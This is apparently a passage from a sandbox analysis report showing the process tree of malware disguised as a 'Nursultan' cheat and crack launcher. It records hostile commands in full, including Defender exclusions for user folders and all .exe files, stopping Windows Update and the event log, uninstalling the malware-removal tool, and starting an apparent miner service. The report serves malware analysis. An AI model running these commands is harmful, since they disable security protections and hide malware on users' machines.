        PID:2796
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        20⤵
        Power Settings
        
        PID:2836
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        20⤵
        Launches sc.exe
        
        PID:2336
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        20⤵
        Launches sc.exe
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        19⤵
        Executes dropped EXE
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        19⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        19⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        20⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        19⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        20⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        20⤵
        Executes dropped EXE
        
        PID:940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        20⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        20⤵
        Executes dropped EXE
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        20⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        20⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2212
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        21⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        20⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        21⤵
        Executes dropped EXE
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        21⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        21⤵
        Executes dropped EXE
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        21⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        22⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        21⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        22⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        22⤵
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        22⤵
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        22⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        22⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1628
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        23⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        22⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        23⤵
        
        PID:2868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        23⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        23⤵
        
        PID:1780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        23⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        24⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        23⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        24⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        24⤵
        
        PID:2176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        24⤵
        
        PID:1372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        24⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        24⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1544
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        25⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        24⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        25⤵
        
        PID:1260
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        25⤵
        Drops file in System32 directory
        
        PID:1616
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        26⤵
        Drops file in System32 directory
        
        PID:2744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        26⤵
        
        PID:2220
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        27⤵
        Drops file in Windows directory
        
        PID:2628
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        26⤵
        Launches sc.exe
        
        PID:1316
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        26⤵
        Launches sc.exe
        
        PID:316
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        26⤵
        Launches sc.exe
        
        PID:1488
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        26⤵
        Launches sc.exe
        
        PID:1836
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        26⤵
        Launches sc.exe
        
        PID:2436
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        26⤵
        Power Settings
        
        PID:1372
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        26⤵
        Power Settings
        
        PID:3032
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        26⤵
        Power Settings
        
        PID:1776
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        26⤵
        Power Settings
        
        PID:1888
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        26⤵
        Launches sc.exe
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        26⤵
        
        PID:828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        25⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        25⤵
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        25⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        25⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        26⤵
        
        PID:2540
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        26⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        25⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        26⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        26⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        26⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        26⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        26⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        26⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1372
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        27⤵
        
        PID:1536
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        27⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        26⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        27⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        27⤵
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        27⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        27⤵
        
        PID:2776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        27⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        27⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2796
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        28⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        27⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        28⤵
        
        PID:564
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        28⤵
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        28⤵
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        28⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        28⤵
        
        PID:2016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        29⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        28⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        29⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        29⤵
        
        PID:628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        29⤵
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        29⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        29⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:1468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        30⤵
        
        PID:2440
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        29⤵
        Adds Run key to start application
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        30⤵
        
        PID:2432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        30⤵
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        30⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        31⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        30⤵
        Adds Run key to start application
        
        PID:296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        31⤵
        Drops file in System32 directory
        
        PID:2152
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        32⤵
        Drops file in System32 directory
        
        PID:2444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        32⤵
        
        PID:1296
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        33⤵
        Drops file in Windows directory
        
        PID:2432
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        32⤵
        Launches sc.exe
        
        PID:1996
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        32⤵
        Launches sc.exe
        
        PID:2628
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        32⤵
        Launches sc.exe
        
        PID:2620
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        32⤵
        Launches sc.exe
        
        PID:2292
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        32⤵
        Launches sc.exe
        
        PID:2428
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        32⤵
        Power Settings
        
        PID:2192
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        32⤵
        Power Settings
        
        PID:1992
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        32⤵
        Power Settings
        
        PID:2112
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        32⤵
        Power Settings
        
        PID:2108
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        32⤵
        Launches sc.exe
        
        PID:2492
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        32⤵
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        31⤵
        
        PID:2556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        31⤵
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:2408
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        32⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
